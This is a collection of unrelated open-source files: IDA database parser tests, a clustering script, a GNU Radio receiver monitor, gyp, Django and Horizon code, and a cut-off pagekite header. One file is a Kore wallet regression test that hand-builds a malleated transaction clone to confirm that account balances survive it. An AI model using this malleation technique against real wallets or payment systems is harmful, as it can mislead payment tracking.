len(names) == expected assert names[0] == 0x68901010 assert names[-1] == 0x689DE228 @kern32_test( [(695, 32, None), (695, 64, None), (700, 32, None), (700, 64, None),] ) def test_til(kernel32_idb, version, bitness, expected): til = kernel32_idb.til assert til.signature == "IDATIL" assert til.size_i == 4 assert til.size_b == 1 assert til.size_e == 4 syms = til.syms.defs types = til.types.defs assert len(types) == 106 assert len(syms) == 61 # 1 GUID typedef _GUID assert types[0].name == "GUID" # 2 # struct _GUID # { # unsigned __int32 Data1; # unsigned __int16 Data2; # unsigned __int16 Data3; # unsigned __int8 Data4[8]; # }; assert types[1].name == "_GUID" assert types[1].fields == ["Data1", 
"Data2", "Data3", "Data4"] # TODO: don't known how to use the type_info field # assert types[0].type_info == '\x0d!$##\x1b\x09"' # 5 JOBOBJECTINFOCLASS typedef _JOBOBJECTINFOCLASS assert types[4].name == "JOBOBJECTINFOCLASS" # 6 # enum _JOBOBJECTINFOCLASS # { # JobObjectBasicAccountingInformation = 0x1, # JobObjectBasicLimitInformation = 0x2, # JobObjectBasicProcessIdList = 0x3, # JobObjectBasicUIRestrictions = 0x4, # JobObjectSecurityLimitInformation = 0x5, # JobObjectEndOfJobTimeInformation = 0x6, # JobObjectAssociateCompletionPortInformation = 0x7, # MaxJobObjectInfoClass = 0x8, # }; assert types[5].name == "_JOBOBJECTINFOCLASS" assert types[5].fields == [ "JobObjectBasicAccountingInformation", "JobObjectBasicLimitInformation", "JobObjectBasicProcessIdList", "JobObjectBasicUIRestrictions", "JobObjectSecurityLimitInformation", "JobObjectEndOfJobTimeInformation", "JobObjectAssociateCompletionPortInformation", "MaxJobObjectInfoClass", ] assert syms[0].name == "JobObjectBasicAccountingInformation" assert syms[1].name == "JobObjectBasicLimitInformation" assert syms[2].name == "JobObjectBasicProcessIdList" assert syms[3].name == "JobObjectBasicUIRestrictions" assert syms[4].name == "JobObjectSecurityLimitInformation" assert syms[5].name == "JobObjectEndOfJobTimeInformation" assert syms[6].name == "JobObjectAssociateCompletionPortInformation" assert syms[7].name == "MaxJobObjectInfoClass" assert syms[0].ordinal == 0x1 assert syms[1].ordinal == 0x2 assert syms[2].ordinal == 0x3 assert syms[3].ordinal == 0x4 assert syms[4].ordinal == 0x5 assert syms[5].ordinal == 0x6 assert syms[6].ordinal == 0x7 assert syms[7].ordinal == 0x8 assert syms[0].type_info == b"=\x14_JOBOBJECTINFOCLASS" assert syms[1].type_info == b"=\x14_JOBOBJECTINFOCLASS" assert syms[2].type_info == b"=\x14_JOBOBJECTINFOCLASS" assert syms[3].type_info == b"=\x14_JOBOBJECTINFOCLASS" assert syms[4].type_info == b"=\x14_JOBOBJECTINFOCLASS" assert syms[5].type_info == b"=\x14_JOBOBJECTINFOCLASS" assert 
syms[6].type_info == b"=\x14_JOBOBJECTINFOCLASS" assert syms[7].type_info == b"=\x14_JOBOBJECTINFOCLASS" # 59 ULARGE_INTEGER typedef _ULARGE_INTEGER assert types[58].name == "ULARGE_INTEGER" # 60 # union _ULARGE_INTEGER # { # struct # { # DWORD LowPart; # DWORD HighPart; # }; # _ULARGE_INTEGER::$0354AA9C204208F00D0965D07BBE7FAC u; # ULONGLONG QuadPart; # }; assert types[59].name == "_ULARGE_INTEGER" assert types[59].fields == [ "u", "QuadPart", ] # 61 # struct _ULARGE_INTEGER::$0354AA9C204208F00D0965D07BBE7FAC # { # DWORD LowPart; # DWORD HighPart; # }; assert types[60].name == "_ULARGE_INTEGER::$0354AA9C204208F00D0965D07BBE7FAC" assert types[60].fields == [ "LowPart", "HighPart", ] def test_til_affix(): cd = os.path.dirname(__file__) idbpath = os.path.join(cd, "data", "til", "TILTest.dll.i64") with idb.from_file(idbpath) as db: til = db.til assert til.signature == "IDATIL" assert til.size_i == 4 assert til.size_b == 1 assert til.size_e == 4 syms = til.syms.defs types = til.types.defs # 24 # class Base { # public: # Base(const int32_t field0, const int32_t field1, const int32_t field2) # : field0_{field0}, # field1_{field1}, # field2_{field2} { # } # # int32_t field0_, field1_, field2_; # # int32_t foo() const { return field0_ + field1_; } # # int32_t bar() const { return field1_ + field2_; } # }; base = types[23] assert base.name == "Base" assert base.fields == [ "field0_", "field1_", "field2_", ] assert base.type.is_struct() base_members = base.type.type_details.members assert base_members[0].type.is_int() assert base_members[1].type.is_int() assert base_members[2].type.is_int() # 25 # class Derive : Base { # public: # Derive(const int32_t field0, const int32_t field1, const int32_t field2, int32_t field3, int32_t field4, # int32_t field5) : Base(field0, field1, field2), field3_(field3), field4_(field4), field5_(field5) {} # # int32_t field3_, field4_, field5_; # }; derive = types[24] assert derive.name == "Derive" assert derive.fields == [ "field3_", "field4_", 
"field5_", ] assert derive.type.is_struct() derive_members = derive.type.type_details.members assert derive_members[0].is_baseclass() assert ( derive_members[0].type.get_final_tinfo().get_name() == base.type.get_name() ) assert derive_members[1].type.is_int() assert derive_members[2].type.is_int() assert derive_members[3].type.is_int() # struct Outside { # struct { # std::string field0, field1, field2; # } inside; # # std::string foo; # std::string bar; # }; # 34 t34 = types[33] assert t34.name == "Outside::<unnamed_type_inside>" assert t34.fields == [ "field0", "field1", "field2", ] assert t34.type.is_struct() # 35 t35 = types[34] assert t35.name == "Outside" assert t35.fields == [ "inside", "foo", "bar", ] assert t35.type.is_struct() members = t35.type.type_details.members assert members[0].type.get_final_tinfo().is_struct() # class Sorter { # public: # virtual int compare(const void *first, const void *second) = 0; # }; # 52 t52 = types[51] assert t52.name == "Sorter" assert t52.fields == [ "__vftable", ] assert t52.type.is_struct() t52_typ = t52.type.type_details.members[0].type assert t52_typ.is_ptr() assert t52_typ.get_pointed_object().is_decl_typedef() assert t52_typ.get_pointed_object().get_final_tinfo().is_struct() # 53 t53 = types[52] assert t53.name == "Sorter_vtbl" assert t53.fields == [ "compare", "this", ] assert t53.type.is_struct() # 209 # PTP_CLEANUP_GROUP_CANCEL_CALLBACK typedef void (__fastcall *)(void *, void *) # t209 = types[208] assert t209.name == "PTP_CLEANUP_GROUP_CANCEL_CALLBACK" assert t209.type.is_funcptr() assert ( t209.type.get_typestr() == "void (__fastcall *PTP_CLEANUP_GROUP_CANCEL_CALLBACK)(void*, void*)" ) # 79 # _TP_CALLBACK_ENVIRON_V3::<unnamed_type_u>::<unnamed_type_s> # struct # { # unsigned __int32 LongFunction : 1; # unsigned __int32 Persistent : 1; # unsigned __int32 Private : 30; # } assert ( types[78].type.get_typestr() == """struct _TP_CALLBACK_ENVIRON_V3::<unnamed_type_u>::<unnamed_type_s> { unsigned int32 LongFunction 
: 1; unsigned int32 Persistent : 1; unsigned int32 Private : 30; }""" ) # 115 # _TypeDescriptor # struct # { # const void *pVFTable; # void *spare; # char name[]; # } assert ( types[114].type.get_typestr() == """struct _TypeDescriptor { void* pVFTable; void* spare; int8[] name; }""" )
apache-2.0
Kore-Core/kore
qa/rpc-tests/txn_clone.py
1
7951
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Kore Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test proper accounting with an equivalent malleability clone
#

from test_framework.test_framework import KoreTestFramework
from test_framework.util import *


class TxnMallTest(KoreTestFramework):
    """Check wallet accounting when an equivalent (malleated) clone of a
    transaction is mined instead of the original.

    The clone spends the same input and pays the same outputs as tx1 but is
    signed with a different sighash type, so it gets a different txid while
    being economically identical.  After the clone confirms on the other side
    of a network split and the split heals, the original tx1 becomes a
    conflict (negative confirmations) and account balances must still add up.
    """

    def add_options(self, parser):
        # --mineblock additionally exercises the case where tx1/tx2 were
        # already confirmed on node0's side of the split before the clone
        # is mined on the other side.
        parser.add_option("--mineblock", dest="mine_block", default=False, action="store_true",
                          help="Test double-spend of 1-confirmed transaction")

    def setup_network(self):
        # Start with split network:
        return super(TxnMallTest, self).setup_network(True)

    def run_test(self):
        # All nodes should start with 1,250 BTC:
        starting_balance = 1250
        for i in range(4):
            assert_equal(self.nodes[i].getbalance(), starting_balance)
            self.nodes[i].getnewaddress("")  # bug workaround, coins generated assigned to first getnewaddress!

        # Assign coins to foo and bar accounts:
        self.nodes[0].settxfee(.001)

        node0_address_foo = self.nodes[0].getnewaddress("foo")
        fund_foo_txid = self.nodes[0].sendfrom("", node0_address_foo, 1219)
        fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)

        node0_address_bar = self.nodes[0].getnewaddress("bar")
        fund_bar_txid = self.nodes[0].sendfrom("", node0_address_bar, 29)
        fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)

        assert_equal(self.nodes[0].getbalance(""),
                     starting_balance - 1219 - 29 + fund_foo_tx["fee"] + fund_bar_tx["fee"])

        # Coins are sent to node1_address
        node1_address = self.nodes[1].getnewaddress("from0")

        # Send tx1, and another transaction tx2 that won't be cloned
        txid1 = self.nodes[0].sendfrom("foo", node1_address, 40, 0)
        txid2 = self.nodes[0].sendfrom("bar", node1_address, 20, 0)

        # Construct a clone of tx1, to be malleated
        rawtx1 = self.nodes[0].getrawtransaction(txid1, 1)
        clone_inputs = [{"txid": rawtx1["vin"][0]["txid"], "vout": rawtx1["vin"][0]["vout"]}]
        clone_outputs = {rawtx1["vout"][0]["scriptPubKey"]["addresses"][0]: rawtx1["vout"][0]["value"],
                         rawtx1["vout"][1]["scriptPubKey"]["addresses"][0]: rawtx1["vout"][1]["value"]}
        clone_raw = self.nodes[0].createrawtransaction(clone_inputs, clone_outputs)

        # 3 hex manipulations on the clone are required.
        # All offsets below are in hex characters (2 per byte) into the raw
        # serialized transaction.

        # manipulation 1. sequence is at version+#inputs+input+sigstub
        posseq = 2 * (4 + 1 + 36 + 1)
        seqbe = '%08x' % rawtx1["vin"][0]["sequence"]
        # Write the sequence back in little-endian byte order.
        clone_raw = clone_raw[:posseq] + seqbe[6:8] + seqbe[4:6] + seqbe[2:4] + seqbe[0:2] + clone_raw[posseq + 8:]

        # manipulation 2. createrawtransaction randomizes the order of its outputs,
        # so swap them if necessary.
        # output 0 is at version+#inputs+input+sigstub+sequence+#outputs
        # 40 BTC serialized is 00286bee00000000
        pos0 = 2 * (4 + 1 + 36 + 1 + 4 + 1)
        hex40 = "00286bee00000000"
        # output = 8-byte value + 1-byte script length + script
        output_len = 16 + 2 + 2 * int("0x" + clone_raw[pos0 + 16: pos0 + 16 + 2], 0)
        if (rawtx1["vout"][0]["value"] == 40 and clone_raw[pos0: pos0 + 16] != hex40 or
                rawtx1["vout"][0]["value"] != 40 and clone_raw[pos0: pos0 + 16] == hex40):
            output0 = clone_raw[pos0: pos0 + output_len]
            output1 = clone_raw[pos0 + output_len: pos0 + 2 * output_len]
            clone_raw = clone_raw[:pos0] + output1 + output0 + clone_raw[pos0 + 2 * output_len:]

        # manipulation 3. locktime is after outputs
        poslt = pos0 + 2 * output_len
        ltbe = '%08x' % rawtx1["locktime"]
        clone_raw = clone_raw[:poslt] + ltbe[6:8] + ltbe[4:6] + ltbe[2:4] + ltbe[0:2] + clone_raw[poslt + 8:]

        # Use a different signature hash type to sign.  This creates an
        # equivalent but malleated clone (different txid, same effect).
        # Don't send the clone anywhere yet.
        tx1_clone = self.nodes[0].signrawtransaction(clone_raw, None, None, "ALL|ANYONECANPAY")
        assert_equal(tx1_clone["complete"], True)

        # Have node0 mine a block, if requested:
        if (self.options.mine_block):
            self.nodes[0].generate(1)
            sync_blocks(self.nodes[0:2])

        tx1 = self.nodes[0].gettransaction(txid1)
        tx2 = self.nodes[0].gettransaction(txid2)

        # Node0's balance should be starting balance, plus 50BTC for another
        # matured block, minus tx1 and tx2 amounts, and minus transaction fees:
        expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
        if self.options.mine_block:
            expected += 50
        expected += tx1["amount"] + tx1["fee"]
        expected += tx2["amount"] + tx2["fee"]
        assert_equal(self.nodes[0].getbalance(), expected)

        # foo and bar accounts should be debited:
        assert_equal(self.nodes[0].getbalance("foo", 0), 1219 + tx1["amount"] + tx1["fee"])
        assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])

        if self.options.mine_block:
            assert_equal(tx1["confirmations"], 1)
            assert_equal(tx2["confirmations"], 1)
            # Node1's "from0" balance should be both transaction amounts:
            assert_equal(self.nodes[1].getbalance("from0"), -(tx1["amount"] + tx2["amount"]))
        else:
            assert_equal(tx1["confirmations"], 0)
            assert_equal(tx2["confirmations"], 0)

        # Send clone and its parent to miner (node2, on the other side of
        # the split, has never seen tx1 itself).
        self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
        txid1_clone = self.nodes[2].sendrawtransaction(tx1_clone["hex"])
        # ... mine a block...
        self.nodes[2].generate(1)

        # Reconnect the split network, and sync chain:
        connect_nodes(self.nodes[1], 2)
        self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
        self.nodes[2].sendrawtransaction(tx2["hex"])
        self.nodes[2].generate(1)  # Mine another block to make sure we sync
        sync_blocks(self.nodes)

        # Re-fetch transaction info:
        tx1 = self.nodes[0].gettransaction(txid1)
        tx1_clone = self.nodes[0].gettransaction(txid1_clone)
        tx2 = self.nodes[0].gettransaction(txid2)

        # Verify expected confirmations: tx1 conflicts with the mined clone,
        # so it reports negative confirmations.
        assert_equal(tx1["confirmations"], -2)
        assert_equal(tx1_clone["confirmations"], 2)
        assert_equal(tx2["confirmations"], 1)

        # Check node0's total balance; should be same as before the clone,
        # + 100 BTC for 2 matured, less possible orphaned matured subsidy
        expected += 100
        if (self.options.mine_block):
            expected -= 50
        assert_equal(self.nodes[0].getbalance(), expected)
        assert_equal(self.nodes[0].getbalance("*", 0), expected)

        # Check node0's individual account balances.
        # "foo" should have been debited by the equivalent clone of tx1
        assert_equal(self.nodes[0].getbalance("foo"), 1219 + tx1["amount"] + tx1["fee"])
        # "bar" should have been debited by (possibly unconfirmed) tx2
        assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
        # "" should have starting balance, less funding txes, plus subsidies
        assert_equal(self.nodes[0].getbalance("", 0), starting_balance
                     - 1219 + fund_foo_tx["fee"]
                     - 29 + fund_bar_tx["fee"]
                     + 100)

        # Node1's "from0" account balance
        assert_equal(self.nodes[1].getbalance("from0", 0), -(tx1["amount"] + tx2["amount"]))


if __name__ == '__main__':
    TxnMallTest().main()
mit
pathak22/corr_clustering
src/random_geom_model.py
1
4416
# ---------------------------------------------------------------------
# Model 1 : Random Geometric Graph
# Python script to generate data using model-1 and perform greedy pivot
# algorithm.
#
# Note: All Indices, whatsoever, start from 0.
# ---------------------------------------------------------------------

import random
import networkx as nx
import numpy as np

# ---------------------------------------------------------------------
# Initalize parameters
# ---------------------------------------------------------------------
seed = 222
k = 5           # Number of cluster
th = 0.3        # GRG threshold
ni = 20         # Number of nodes per cluster
n = ni*k        # Total number of nodes
p = 0.2         # Intra-cluster flipping probability
q = 0.4         # Inter-cluster connected flipping probability
epsilon = 0.05  # Inter-cluster disconnected flipping probability

# ---------------------------------------------------------------------
# Generate geometric random graph over the k CLUSTERS : gr
# gr has one node per cluster; an edge between two cluster-nodes means
# the clusters are "close", so spurious edges between their vertices
# appear with the larger probability q (epsilon otherwise).
# ---------------------------------------------------------------------
random.seed(seed)
np.random.seed(seed)
# BUGFIX: the third positional argument of random_geometric_graph is the
# embedding dimension `dim`, not a seed; the original call built a
# 222-dimensional graph.  Reproducibility already comes from the
# random.seed()/np.random.seed() calls above.
gr = nx.random_geometric_graph(k, th)

# ---------------------------------------------------------------------
# Generate inital connected graph : g0 (k disjoint cliques of size ni)
# ---------------------------------------------------------------------
g0 = nx.Graph()
for i in range(k):
    nodeList = range(ni*i, ni*i+ni)
    edgeList = [(x, y) for x in nodeList for y in nodeList if x < y]
    g0.add_nodes_from(nodeList)
    g0.add_edges_from(edgeList)

# ---------------------------------------------------------------------
# Generate final graph after flipping : gf
# ---------------------------------------------------------------------
nodeList = g0.nodes()
edgeList = [(x, y) for x in nodeList for y in nodeList if x < y]
gf = g0.copy()
for e in edgeList:
    cu, cv = int(e[0]/ni), int(e[1]/ni)  # cluster ids of the two endpoints
    # Both vertices in same cluster
    if cu == cv:
        if np.random.binomial(1, p):
            gf.remove_edge(e[0], e[1])
    # Both vertices in diff cluster and the CLUSTERS are connected in gr.
    # BUGFIX: the original tested gr.has_edge(e[0], e[1]) with raw vertex
    # ids, but gr only has k (=5) nodes, so this branch was unreachable
    # for every inter-cluster pair and q was never used.
    elif gr.has_edge(cu, cv):
        if np.random.binomial(1, q):
            gf.add_edge(e[0], e[1])
    # Both vertices in diff cluster and clusters not-connected in gr
    else:
        if np.random.binomial(1, epsilon):
            gf.add_edge(e[0], e[1])

# ---------------------------------------------------------------------
# Write the data
# ---------------------------------------------------------------------
fid = open('./data/data_randomGeomModel.txt', 'w')
fid.write('# First Line : n p q epsilon\n')
fid.write('# Following Lines : groundTruthClusterID vertexID listOfNeighbours\n')
fid.write('{} {} {} {}'.format(n, p, q, epsilon))
for v in gf.nodes_iter():
    fid.write('\n{} {}'.format(int(v/ni), v))
    for i in gf.neighbors(v):
        fid.write(' {}'.format(i))
fid.close()


# ---------------------------------------------------------------------
def pivot_algorithm(gOriginal):
    # ---------------------------------------------------------------------
    # This algorithm is the CC-Pivot (Greedy Algorithm) Algorithm suggested
    # Ailon et. al. [STOC 2005] and again mentioned in Elsner et. al. [2009].
    # For edges with signs +/- and minimization objective, this algorithm
    # is 3OPT. While for weighted edges, with w_ij^+ + w_ij^- = 1, this
    # algorithm is 5OPT.
    #
    # This function takes a graph g which is of the form networkx.Graph()
    # and annotates each node with its clustering label under the attribute
    # key 'clusterId'.
    #
    # This is tail recursion implementation of algorithm formatted in the
    # form of loop, till nodes() become empty in temporary graph.
    clusterId = 100  # arbitrary starting label; only the grouping matters
    gNew = gOriginal.copy()
    while gNew.nodes():
        # Pick a uniformly random remaining node as the pivot; the pivot
        # and all of its remaining neighbours form one cluster.
        pivot = gNew.nodes()[random.randint(0, len(gNew.nodes())-1)]
        gOriginal.node[pivot]['clusterId'] = clusterId
        for v in gNew.neighbors(pivot):
            gOriginal.node[v]['clusterId'] = clusterId
        gNew.remove_nodes_from(gNew.neighbors(pivot))
        gNew.remove_node(pivot)
        clusterId = clusterId + 1

# ---------------------------------------------------------------------
# Run Greedy and save output to file
# ---------------------------------------------------------------------
pivot_algorithm(gf)
fid = open('./data/solution_randomGeomModel.txt', 'w')
fid.write('# Note: GroundTruthClusterID ObtainedClusterID dont correspond, they just denote grouping of nodes.\n')
fid.write('Node GroundTruthClusterID ObtainedClusterID')
for v in gf.nodes_iter():
    fid.write('\n{} {} {}'.format(v, int(v/ni), gf.node[v]['clusterId']))
fid.close()
gpl-2.0
bastibl/gnuradio
gr-dtv/examples/atsc_ctrlport_monitor.py
7
6277
#!/usr/bin/env python
#
# Copyright 2015 Free Software Foundation
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; see the file COPYING.  If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#

from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals

import sys
import matplotlib
matplotlib.use("QT4Agg")
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from gnuradio.ctrlport.GNURadioControlPortClient import (
    GNURadioControlPortClient, TTransportException,
)
import numpy
from numpy.fft import fftpack

"""
If a host is running the ATSC receiver chain with ControlPort
turned on, this script will connect to the host using the hostname and
port pair of the ControlPort instance and display metrics of the
receiver. The ATSC publishes information about the success of the
Reed-Solomon decoder and Viterbi metrics for use here in displaying
the link quality. This also gets the equalizer taps of the receiver
and displays the frequency response.
"""


class atsc_ctrlport_monitor(object):
    """Live matplotlib dashboard for an ATSC receiver exposed via ControlPort.

    Draws four panels: equalizer taps, equalizer frequency response,
    received symbols, and a table of Reed-Solomon / Viterbi / SNR metrics,
    refreshed by a matplotlib FuncAnimation loop.
    """

    def __init__(self, host, port):
        # Connect to the remote flowgraph's ControlPort endpoint over thrift.
        argv = [None, host, port]
        radiosys = GNURadioControlPortClient(argv=argv, rpcmethod='thrift')
        self.radio = radiosys.client
        print(self.radio)

        # Seed the 100-sample Viterbi-metric history with the current mean
        # so the running average starts at a sensible value.
        vt_init_key = 'dtv_atsc_viterbi_decoder0::decoder_metrics'
        data = self.radio.getKnobs([vt_init_key])[vt_init_key]
        init_metric = numpy.mean(data.value)
        self._viterbi_metric = 100*[init_metric,]

        table_col_labels = ('Num Packets', 'Error Rate', 'Packet Error Rate',
                            'Viterbi Metric', 'SNR')

        # Figure layout: 3 stacked plots + 1 axis reserved for the table.
        self._fig = plt.figure(1, figsize=(12, 12), facecolor='w')
        self._sp0 = self._fig.add_subplot(4, 1, 1)
        self._sp1 = self._fig.add_subplot(4, 1, 2)
        self._sp2 = self._fig.add_subplot(4, 1, 3)
        self._plot_taps = self._sp0.plot([], [], 'k', linewidth=2)
        self._plot_psd = self._sp1.plot([], [], 'k', linewidth=2)
        self._plot_data = self._sp2.plot([], [], 'ok', linewidth=2,
                                         markersize=4, alpha=0.05)

        self._ax2 = self._fig.add_subplot(4, 1, 4)
        self._table = self._ax2.table(cellText=[len(table_col_labels)*['0']],
                                      colLabels=table_col_labels,
                                      loc='center')
        self._ax2.axis('off')
        cells = self._table.properties()['child_artists']
        for c in cells:
            c.set_lw(0.1)  # set's line width
            c.set_ls('solid')
            c.set_height(0.2)

        # FuncAnimation calls update_data(frame, *fargs) periodically;
        # the returned artists are redrawn (blit=True).
        ani = animation.FuncAnimation(self._fig, self.update_data, frames=200,
                                      fargs=(self._plot_taps[0],
                                             self._plot_psd[0],
                                             self._plot_data[0],
                                             self._table),
                                      init_func=self.init_function,
                                      blit=True)
        plt.show()

    def update_data(self, x, taps, psd, syms, table):
        """Animation callback: poll all knobs and refresh every panel.

        `x` is the (unused) frame number supplied by FuncAnimation; the
        remaining arguments are the artists passed via `fargs`.
        """
        try:
            eqdata_key = 'dtv_atsc_equalizer0::taps'
            symdata_key = 'dtv_atsc_equalizer0::data'
            rs_nump_key = 'dtv_atsc_rs_decoder0::num_packets'
            rs_numbp_key = 'dtv_atsc_rs_decoder0::num_bad_packets'
            rs_numerrs_key = 'dtv_atsc_rs_decoder0::num_errors_corrected'
            vt_metrics_key = 'dtv_atsc_viterbi_decoder0::decoder_metrics'
            snr_key = 'probe2_f0::SNR'

            # NOTE(review): an empty key list appears to request *all*
            # knobs from ControlPort — confirm against the getKnobs API.
            data = self.radio.getKnobs([])

            eqdata = data[eqdata_key]
            symdata = data[symdata_key]
            rs_num_packets = data[rs_nump_key]
            rs_num_bad_packets = data[rs_numbp_key]
            rs_num_errors_corrected = data[rs_numerrs_key]
            vt_decoder_metrics = data[vt_metrics_key]
            snr_est = data[snr_key]

            # Push the newest mean metric into the 100-deep history.
            vt_decoder_metrics = numpy.mean(vt_decoder_metrics.value)
            self._viterbi_metric.pop()
            self._viterbi_metric.insert(0, vt_decoder_metrics)

        except TTransportException:
            sys.stderr.write("Lost connection, exiting")
            sys.exit(1)

        # Panel 0: raw equalizer taps.
        ntaps = len(eqdata.value)
        taps.set_ydata(eqdata.value)
        taps.set_xdata(list(range(ntaps)))
        self._sp0.set_xlim(0, ntaps)
        self._sp0.set_ylim(min(eqdata.value), max(eqdata.value))

        # Panel 1: frequency response of the taps (10k-point FFT, dB).
        fs = 6.25e6
        freq = numpy.linspace(-fs / 2, fs / 2, 10000)
        H = numpy.fft.fftshift(fftpack.fft(eqdata.value, 10000))
        HdB = 20.0*numpy.log10(abs(H))
        psd.set_ydata(HdB)
        psd.set_xdata(freq)
        self._sp1.set_xlim(0, fs / 2)
        self._sp1.set_ylim([min(HdB), max(HdB)])
        self._sp1.set_yticks([min(HdB), max(HdB)])
        self._sp1.set_yticklabels(["min", "max"])

        # Panel 2: received symbols scattered on a vertical line.
        nsyms = len(symdata.value)
        syms.set_ydata(symdata.value)
        syms.set_xdata(nsyms*[0,])
        self._sp2.set_xlim([-1, 1])
        self._sp2.set_ylim([-10, 10])

        # Table: packet error rate and bit error rate from the RS decoder
        # (187 data bytes per ATSC RS packet).
        per = float(rs_num_bad_packets.value) / float(rs_num_packets.value)
        ber = float(rs_num_errors_corrected.value) / float(187*rs_num_packets.value)

        table._cells[(1, 0)]._text.set_text("{0}".format(rs_num_packets.value))
        table._cells[(1, 1)]._text.set_text("{0:.2g}".format(ber))
        table._cells[(1, 2)]._text.set_text("{0:.2g}".format(per))
        table._cells[(1, 3)]._text.set_text("{0:.1f}".format(numpy.mean(self._viterbi_metric)))
        table._cells[(1, 4)]._text.set_text("{0:.4f}".format(snr_est.value[0]))

        return (taps, psd, syms, table)

    def init_function(self):
        # Artists to draw before the first frame (required for blitting).
        return self._plot_taps + self._plot_psd + self._plot_data


if __name__ == "__main__":
    host = sys.argv[1]
    port = sys.argv[2]
    m = atsc_ctrlport_monitor(host, port)
gpl-3.0
hkernbach/arangodb
3rdParty/V8/v5.7.492.77/tools/gyp/pylib/gyp/MSVSToolFile.py
2736
1804
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

"""Visual Studio project reader/writer."""

import gyp.common
import gyp.easy_xml as easy_xml


class Writer(object):
  """Visual Studio XML tool file writer."""

  def __init__(self, tool_file_path, name):
    """Initializes the tool file.

    Args:
      tool_file_path: Path to the tool file.
      name: Name of the tool file.
    """
    self.tool_file_path = tool_file_path
    self.name = name
    # Accumulated ['Rules', rule, rule, ...] section written on save.
    self.rules_section = ['Rules']

  def AddCustomBuildRule(self, name, cmd, description,
                         additional_dependencies,
                         outputs, extensions):
    """Adds a rule to the tool file.

    Args:
      name: Name of the rule.
      description: Description of the rule.
      cmd: Command line of the rule.
      additional_dependencies: other files which may trigger the rule.
      outputs: outputs of the rule.
      extensions: extensions handled by the rule.
    """
    attributes = {
        'Name': name,
        'ExecutionDescription': description,
        'CommandLine': cmd,
        'Outputs': ';'.join(outputs),
        'FileExtensions': ';'.join(extensions),
        'AdditionalDependencies': ';'.join(additional_dependencies),
    }
    self.rules_section.append(['CustomBuildRule', attributes])

  def WriteIfChanged(self):
    """Writes the tool file."""
    document = [
        'VisualStudioToolFile',
        {'Version': '8.00', 'Name': self.name},
        self.rules_section,
    ]
    easy_xml.WriteXmlIfChanged(document, self.tool_file_path,
                               encoding="Windows-1252")
apache-2.0
undoware/neutron-drive
google_appengine/lib/django_1_3/django/core/management/commands/startapp.py
321
1909
import os

from django.core.management.base import copy_helper, CommandError, LabelCommand
from django.utils.importlib import import_module


class Command(LabelCommand):
    help = "Creates a Django app directory structure for the given app name in the current directory."
    args = "[appname]"
    label = 'application name'

    requires_model_validation = False
    # Can't import settings during this command, because they haven't
    # necessarily been created.
    can_import_settings = False

    def handle_label(self, app_name, directory=None, **options):
        """Create the skeleton for *app_name* inside *directory*.

        *directory* defaults to the current working directory; its basename
        is taken to be the project name.
        """
        target_dir = os.getcwd() if directory is None else directory

        # Determine the project_name by using the basename of target_dir,
        # which should be the full path of the project directory (or the
        # current directory if no directory was passed).
        project_name = os.path.basename(target_dir)
        if app_name == project_name:
            raise CommandError("You cannot create an app with the same name"
                               " (%r) as your project." % app_name)

        # Refuse app names that shadow an importable Python module.
        try:
            import_module(app_name)
        except ImportError:
            copy_helper(self.style, 'app', app_name, target_dir, project_name)
        else:
            raise CommandError("%r conflicts with the name of an existing Python module and cannot be used as an app name. Please try another name." % app_name)


class ProjectCommand(Command):
    help = ("Creates a Django app directory structure for the given app name"
            " in this project's directory.")

    def __init__(self, project_directory):
        super(ProjectCommand, self).__init__()
        # Apps are always created inside this fixed project directory.
        self.project_directory = project_directory

    def handle_label(self, app_name, **options):
        return super(ProjectCommand, self).handle_label(
            app_name, self.project_directory, **options)
bsd-3-clause
newrocknj/horizon
openstack_dashboard/views.py
50
1395
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

from django import shortcuts
import django.views.decorators.vary

import horizon
from horizon import base
from horizon import exceptions


def get_user_home(user):
    """Return the absolute URL of the dashboard *user* should land on."""
    home = None
    if user.is_superuser:
        try:
            home = horizon.get_dashboard('admin')
        except base.NotRegistered:
            # No 'admin' dashboard registered; fall back to the default.
            pass
    if home is None:
        home = horizon.get_default_dashboard()
    return home.get_absolute_url()


@django.views.decorators.vary.vary_on_cookie
def splash(request):
    """Entry point view: bounce an authenticated user to their home page."""
    if not request.user.is_authenticated():
        raise exceptions.NotAuthenticated()

    destination = horizon.get_user_home(request.user)
    response = shortcuts.redirect(destination)
    # 'logout_reason' is a one-shot message cookie; clear it once consumed.
    if 'logout_reason' in request.COOKIES:
        response.delete_cookie('logout_reason')
    return response
apache-2.0
lyoshenka/PyPagekite
pagekite/yamond.py
2
5903
"""
This is a class implementing a flexible metric-store and an HTTP
thread for browsing the numbers.
"""
##############################################################################
LICENSE = """\
This file is part of pagekite.py.
Copyright 2010-2013, the Beanstalks Project ehf. and Bjarni Runar Einarsson

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
